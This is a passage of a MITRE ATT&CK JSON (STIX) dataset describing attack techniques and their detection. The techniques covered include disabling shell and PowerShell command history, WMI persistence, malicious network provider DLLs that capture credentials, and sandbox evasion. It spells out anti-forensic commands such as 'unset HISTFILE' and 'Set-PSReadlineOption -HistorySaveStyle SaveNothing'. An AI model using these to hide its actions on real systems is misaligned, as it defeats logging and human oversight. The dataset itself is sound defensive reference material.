flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Vikas Singh, Sophos", "Emile Kenning, Sophos", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to clear or disable historical log data with built-in features native to the network device platform. Monitor such command activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis", "Log analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "created": "2020-02-21T20:56:06.498Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/003", "external_id": "T1562.003"}, {"source_name": "Sophos PowerShell command audit", "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.", "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit"}, {"source_name": "Microsoft PowerShell Command History", "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.", "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"}, {"source_name": "Sophos PowerShell Command History Forensics", "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.", "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Launchd", "description": "This technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \n\nAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3", "created": "2019-12-03T14:15:27.452Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/004", "external_id": "T1053.004"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Network Provider DLL", "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["CrowdStrike Falcon OverWatch", "Jai Minton"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", "created": "2023-03-30T22:45:00.431Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/008", "external_id": "T1556.008"}, {"source_name": "NPPSPY - Huntress", "description": " Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.", "url": "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy"}, {"source_name": "NPPSPY Video", "description": "Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.", "url": "https://www.youtube.com/watch?v=ggY3srD9dYs"}, {"source_name": "NPPSPY", "description": "Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.", "url": "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy"}, {"source_name": "Network Provider API", "description": "Microsoft. (2021, January 7). Network Provider API. Retrieved March 30, 2023.", "url": "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api"}, {"source_name": "NPLogonNotify", "description": "Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.", "url": "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-13T14:08:20.882Z", "name": "Windows Management Instrumentation Event Subscription", "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts \u2013 using `mofcomp.exe` \u2013into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Brent Murphy, Elastic", "David French, Elastic", "Viren Chaudhari, Qualys"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence.(Citation: TechNet Autoruns)(Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).(Citation: Microsoft Register-WmiEvent)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "created": "2020-01-24T14:07:56.276Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/003", "external_id": "T1546.003"}, {"source_name": "FireEye WMI 2015", "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"}, {"source_name": "Dell WMI Persistence", "description": "Dell SecureWorks Counter Threat Unit\u2122 (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.", "url": "https://www.secureworks.com/blog/wmi-persistence"}, {"source_name": "FireEye WMI SANS 2015", "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf"}, {"source_name": "Medium Detecting WMI Persistence", "description": "French, D. (2018, October 9). Detecting & Removing an Attacker\u2019s WMI Persistence. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96"}, {"source_name": "Elastic - Hunting for Persistence Part 1", "description": "French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.", "url": "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1"}, {"source_name": "Mandiant M-Trends 2015", "description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.", "url": "https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf"}, {"source_name": "Microsoft Register-WmiEvent", "description": "Microsoft. (n.d.). Retrieved January 24, 2020.", "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Microsoft MOF May 2018", "description": "Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "CDNs", "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor\u2019s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization\u2019s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", "created": "2020-10-02T16:59:56.648Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1596/004", "external_id": "T1596.004"}, {"source_name": "DigitalShadows CDN", "description": "Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed \u2013 How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.", "url": "https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "User Activity Based Checks", "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Deloitte Threat Library Team"], "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Static File Analysis", "Signature-based detection", "Host forensic analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "created": "2020-03-06T21:04:12.454Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1497/002", "external_id": "T1497.002"}, {"source_name": "Deloitte Environment Awareness", "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc"}, {"source_name": "Sans Virtual Jan 2016", "description": "Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.", "url": "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667"}, {"source_name": "Unit 42 Sofacy Nov 2018", "description": "Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved April 23, 2019.", "url": "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"}, {"source_name": "FireEye FIN7 April 2017", "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Input Prompt", "description": "When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Molyett, @s1air, Cisco Talos"], "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Scripting](https://attack.mitre.org/techniques/T1064) that could be used to prompt users for credentials.\n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--91ce1ede-107f-4d8b-bf4c-735e8789c94b", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1141", "external_id": "T1141"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/569.html", "external_id": "CAPEC-569"}, {"source_name": "OSX Malware Exploits MacKeeper", "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.", "url": "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"}, {"source_name": "LogRhythm Do You Trust Oct 2014", "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.", "url": "https://logrhythm.com/blog/do-you-trust-your-computer/"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "Enigma Phishing for Credentials Jan 2015", "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.", "url": "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-10-25T15:49:14.785Z", "name": "Cloud Accounts", "description": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nCreating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.0.0", "x_mitre_contributors": ["Francesco Bigarella"], "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", "created": "2022-05-27T14:06:05.130Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1585/003", "external_id": "T1585.003"}, {"source_name": "Awake Security C2 Cloud", "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.", "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-04-12T03:40:37.954Z", "name": "Software Deployment Tools", "description": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001) to communicate back to adversary owned infrastructure.(Citation: Mitiga Security Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shane Tully, @securitygypsy", "Joe Gumke, U.S. Bank", "Tamir Yehuda"], "x_mitre_deprecated": false, "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network", "SaaS"], "x_mitre_version": "3.0", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "created": "2017-05-31T21:30:57.201Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1072", "external_id": "T1072"}, {"source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation", "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.", "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"}, {"source_name": "SpecterOps Lateral Movement from Azure to On-Prem AD 2020", "description": "Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.", "url": 